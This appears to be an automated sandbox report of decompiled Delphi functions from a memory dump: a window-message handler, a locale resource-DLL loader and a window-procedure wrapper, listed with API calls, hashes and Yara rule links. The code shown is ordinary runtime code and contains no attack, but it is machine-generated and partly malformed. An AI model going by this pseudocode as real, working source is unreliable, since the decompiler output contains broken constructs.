                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1759228003-2375825460
                                                                        • Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
                                                                        • Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00455880, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00455880(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x455f10);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E00455734(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004577D8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E004557F8(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045647C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00456420(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044D7A0(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00456960(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043CC2C(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043CC2C(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043CC2C(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x47aaf4 = 0;
											_t206 = GetFocus();
											SetFocus(E0043CC2C(_t367));
											E00437760(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x47aaf4 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E004562F8(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00455F74(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00456024(_v8);
								} else {
									E004557F8(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00455F58(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BBC8("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x496c08; // 0x217094c
							E00454D9C(_t267);
							E004557F8(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x495bf8; // 0x496b6c
							E00441478( *_t271, _t312,  *(_v12 + 4));
							E0045578C(_v8, _t303, _t312, _v12, _t365);
							E004557F8(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E004557F8(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00455688();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00455698(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00455924))) {
						case 0:
							__eax = E0041C0B0();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L004070E4();
							__eax = E004557F8(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004557F8(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044D650( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00455690();
							} else {
								_v8 = E00455698(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004557F8(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00407044();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004557F8(__ebp);
							} else {
								__eax = E00455834(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00453004(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004557F8(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E00414208( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}





















































                                                                        0x00455880
                                                                        0x00455887
                                                                        0x00455889
                                                                        0x0045588c
                                                                        0x00455891
                                                                        0x00455892
                                                                        0x00455897
                                                                        0x0045589a
                                                                        0x004558a2
                                                                        0x004558b1
                                                                        0x004558b4
                                                                        0x004558e8
                                                                        0x004558ee
                                                                        0x004558f6
                                                                        0x004558f8
                                                                        0x004558fa
                                                                        0x004558fd
                                                                        0x004559b1
                                                                        0x004559b6
                                                                        0x004559fc
                                                                        0x00455a01
                                                                        0x00455a22
                                                                        0x00455a22
                                                                        0x00455a27
                                                                        0x00455e94
                                                                        0x00455e97
                                                                        0x00455e9b
                                                                        0x00455eb7
                                                                        0x00455e9d
                                                                        0x00455ea9
                                                                        0x00455ea9
                                                                        0x00455f06
                                                                        0x00455f06
                                                                        0x00455f08
                                                                        0x00455f0b
                                                                        0x00000000
                                                                        0x00455f0b
                                                                        0x00455a30
                                                                        0x00455a33
                                                                        0x00455cf2
                                                                        0x00455a39
                                                                        0x00455eff
                                                                        0x00455f00
                                                                        0x00455f05
                                                                        0x00000000
                                                                        0x00455a33
                                                                        0x00455a03
                                                                        0x00455e5e
                                                                        0x00455e61
                                                                        0x00455e65
                                                                        0x00455e8d
                                                                        0x00455e67
                                                                        0x00455e75
                                                                        0x00455e75
                                                                        0x00000000
                                                                        0x00455e65
                                                                        0x00455a09
                                                                        0x00455a09
                                                                        0x00455a0e
                                                                        0x00455e0c
                                                                        0x00455e11
                                                                        0x00455e13
                                                                        0x00455e19
                                                                        0x00455e1e
                                                                        0x00455e21
                                                                        0x00455e24
                                                                        0x00455e2c
                                                                        0x00455e31
                                                                        0x00455e33
                                                                        0x00455e3a
                                                                        0x00455e3a
                                                                        0x00455e33
                                                                        0x00455e24
                                                                        0x00000000
                                                                        0x00455e13
                                                                        0x00455a14
                                                                        0x00455a17
                                                                        0x00455e44
                                                                        0x00455e54
                                                                        0x00000000
                                                                        0x00455a1d
                                                                        0x00000000
                                                                        0x00455a1d
                                                                        0x00455a17
                                                                        0x004559b8
                                                                        0x00455d1f
                                                                        0x00455d22
                                                                        0x00455d24
                                                                        0x00455d2a
                                                                        0x00455d2e
                                                                        0x00455d33
                                                                        0x00455d35
                                                                        0x00455d43
                                                                        0x00455d48
                                                                        0x00455d4a
                                                                        0x00455d58
                                                                        0x00455d5d
                                                                        0x00455d5f
                                                                        0x00455d65
                                                                        0x00455d6c
                                                                        0x00455d7b
                                                                        0x00455d94
                                                                        0x00455d9a
                                                                        0x00455d9f
                                                                        0x00455da9
                                                                        0x00455da9
                                                                        0x00455d5f
                                                                        0x00455d4a
                                                                        0x00455d35
                                                                        0x00000000
                                                                        0x00455d24
                                                                        0x004559be
                                                                        0x004559c3
                                                                        0x004559e3
                                                                        0x004559e3
                                                                        0x004559e8
                                                                        0x00455ddd
                                                                        0x00455de0
                                                                        0x00455de8
                                                                        0x00455dfa
                                                                        0x00455dfa
                                                                        0x00000000
                                                                        0x00455de8
                                                                        0x004559ee
                                                                        0x004559f1
                                                                        0x00455d00
                                                                        0x00455d05
                                                                        0x00455d07
                                                                        0x00455d10
                                                                        0x00455d10
                                                                        0x00000000
                                                                        0x004559f7
                                                                        0x00000000
                                                                        0x004559f7
                                                                        0x004559f1
                                                                        0x004559c5
                                                                        0x00455db5
                                                                        0x00455db8
                                                                        0x00455dc0
                                                                        0x00455dd2
                                                                        0x00455dd2
                                                                        0x00000000
                                                                        0x00455dc0
                                                                        0x004559cb
                                                                        0x004559cb
                                                                        0x004559d0
                                                                        0x00455a49
                                                                        0x00455a49
                                                                        0x00455a4e
                                                                        0x00455a5c
                                                                        0x00455a50
                                                                        0x00455a50
                                                                        0x00455a55
                                                                        0x00455a69
                                                                        0x00455a57
                                                                        0x00455a74
                                                                        0x00455a79
                                                                        0x00455a55
                                                                        0x00000000
                                                                        0x00455a4e
                                                                        0x004559d5
                                                                        0x004559d8
                                                                        0x00455c01
                                                                        0x00000000
                                                                        0x004559de
                                                                        0x00000000
                                                                        0x004559de
                                                                        0x004559d8
                                                                        0x00455903
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455909
                                                                        0x0045590c
                                                                        0x00455978
                                                                        0x0045597b
                                                                        0x0045599a
                                                                        0x0045599a
                                                                        0x0045599d
                                                                        0x00455adf
                                                                        0x00000000
                                                                        0x00455adf
                                                                        0x004559a3
                                                                        0x004559a6
                                                                        0x00455c25
                                                                        0x00455c2b
                                                                        0x00455c31
                                                                        0x00455c37
                                                                        0x00455c3a
                                                                        0x00455c41
                                                                        0x00455c47
                                                                        0x00455c4a
                                                                        0x00455c51
                                                                        0x00455cd1
                                                                        0x00455c53
                                                                        0x00455c62
                                                                        0x00455c67
                                                                        0x00455c6d
                                                                        0x00455c6f
                                                                        0x00455cb9
                                                                        0x00455cc1
                                                                        0x00455c71
                                                                        0x00455c76
                                                                        0x00455c8d
                                                                        0x00455c8f
                                                                        0x00455c91
                                                                        0x00455c93
                                                                        0x00455c9c
                                                                        0x00455caa
                                                                        0x00455caa
                                                                        0x00455c93
                                                                        0x00455c6f
                                                                        0x00455c51
                                                                        0x00455c41
                                                                        0x00000000
                                                                        0x004559ac
                                                                        0x00000000
                                                                        0x004559ac
                                                                        0x004559a6
                                                                        0x0045597d
                                                                        0x00455ee5
                                                                        0x00455eea
                                                                        0x00455ef0
                                                                        0x00000000
                                                                        0x00455ef5
                                                                        0x00455983
                                                                        0x00455983
                                                                        0x00455986
                                                                        0x00455ec5
                                                                        0x00455ecc
                                                                        0x00455ed7
                                                                        0x00455edd
                                                                        0x00000000
                                                                        0x00455ee2
                                                                        0x0045598c
                                                                        0x0045598f
                                                                        0x00455b09
                                                                        0x00455b0f
                                                                        0x00455b12
                                                                        0x00455b16
                                                                        0x00455b1c
                                                                        0x00455b22
                                                                        0x00455b25
                                                                        0x00455b29
                                                                        0x00455b50
                                                                        0x00455b65
                                                                        0x00455b2b
                                                                        0x00455b2e
                                                                        0x00455b43
                                                                        0x00455b43
                                                                        0x00000000
                                                                        0x00455995
                                                                        0x00000000
                                                                        0x00455995
                                                                        0x0045598f
                                                                        0x0045590e
                                                                        0x00455c09
                                                                        0x00455c0c
                                                                        0x00455c10
                                                                        0x00455c19
                                                                        0x00455c19
                                                                        0x00000000
                                                                        0x00455c10
                                                                        0x00455914
                                                                        0x00455917
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045591d
                                                                        0x00000000
                                                                        0x00455ef8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455ae7
                                                                        0x00455ae9
                                                                        0x00455aeb
                                                                        0x00455af3
                                                                        0x00455af6
                                                                        0x00455af7
                                                                        0x00455afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455b6f
                                                                        0x00455b72
                                                                        0x00455b76
                                                                        0x00455baa
                                                                        0x00455bb0
                                                                        0x00455bb3
                                                                        0x00455bba
                                                                        0x00455bbc
                                                                        0x00455bbf
                                                                        0x00455bc2
                                                                        0x00455bc7
                                                                        0x00455bca
                                                                        0x00455bca
                                                                        0x00455bd3
                                                                        0x00455b78
                                                                        0x00455b7b
                                                                        0x00455b80
                                                                        0x00455b83
                                                                        0x00455b89
                                                                        0x00455b8b
                                                                        0x00455b92
                                                                        0x00455b95
                                                                        0x00455b95
                                                                        0x00455b97
                                                                        0x00455b97
                                                                        0x00455b9e
                                                                        0x00455ba3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455a97
                                                                        0x00455a9a
                                                                        0x00455a9d
                                                                        0x00455a9e
                                                                        0x00455aa3
                                                                        0x00455aa5
                                                                        0x00455ab4
                                                                        0x00455aa7
                                                                        0x00455aa8
                                                                        0x00455aad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455a7f
                                                                        0x00455a82
                                                                        0x00455a85
                                                                        0x00455a87
                                                                        0x00455a8d
                                                                        0x00455a8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455abf
                                                                        0x00455ac2
                                                                        0x00455ac9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004558b6
                                                                        0x004558b6
                                                                        0x004558b7
                                                                        0x00000000
                                                                        0x004558b9
                                                                        0x004558d5
                                                                        0x00000000
                                                                        0x004558d7
                                                                        0x004558d7
                                                                        0x004558d9
                                                                        0x004558dc
                                                                        0x004558dc
                                                                        0x00455f25
                                                                        0x00455f2b
                                                                        0x004558e4
                                                                        0x004558e4
                                                                        0x004558e5
                                                                        0x004558e5
                                                                        0x004558e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004558e6

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RegisterAutomation$lkI$vcltest3.dll
                                                                        • API String ID: 0-607161752
                                                                        • Opcode ID: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction ID: f2d9504c2ba57309c7552e980363ea0a8989d55f74f96697af3e275cc6580183
                                                                        • Opcode Fuzzy Hash: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction Fuzzy Hash: D9E1AD31A00A05DFDB10DB69C595A6EB7F1AF08311F2881A6FD059B363D738EE49DB09
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405DAC, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E00405DAC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401338();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401340();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401338();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401338();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401338();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                        0x00405dac
                                                                        0x00405db4
                                                                        0x00405dbb
                                                                        0x00405dbc
                                                                        0x00405dcf
                                                                        0x00405dd4
                                                                        0x00405ddd
                                                                        0x00405ec6
                                                                        0x00405ecd
                                                                        0x00405df3
                                                                        0x00405df3
                                                                        0x00405df9
                                                                        0x00405dfa
                                                                        0x00405e07
                                                                        0x00405e0c
                                                                        0x00405e0f
                                                                        0x00405e0b
                                                                        0x00000000
                                                                        0x00405e0b
                                                                        0x00405e1b
                                                                        0x00405e23
                                                                        0x00405e29
                                                                        0x00405e2e
                                                                        0x00405e3b
                                                                        0x00405e3f
                                                                        0x00405e40
                                                                        0x00405e41
                                                                        0x00405e56
                                                                        0x00405e56
                                                                        0x00405e5a
                                                                        0x00405e73
                                                                        0x00405e77
                                                                        0x00405e78
                                                                        0x00405e79
                                                                        0x00405e89
                                                                        0x00405e8e
                                                                        0x00405e92
                                                                        0x00405e94
                                                                        0x00405ea9
                                                                        0x00405ead
                                                                        0x00405eae
                                                                        0x00405eaf
                                                                        0x00405ebf
                                                                        0x00405ec4
                                                                        0x00405ec4
                                                                        0x00405e92
                                                                        0x00405e5a
                                                                        0x00000000
                                                                        0x00405e23

                                                                        APIs
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1599918012-2375825460
                                                                        • Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
                                                                        • Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004557F8, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E004557F8(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D8C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                        0x00455804
                                                                        0x0045580e
                                                                        0x00455817
                                                                        0x0045581e
                                                                        0x00455821
                                                                        0x00455822
                                                                        0x0045582d
                                                                        0x00455831

                                                                        APIs
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00455822
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
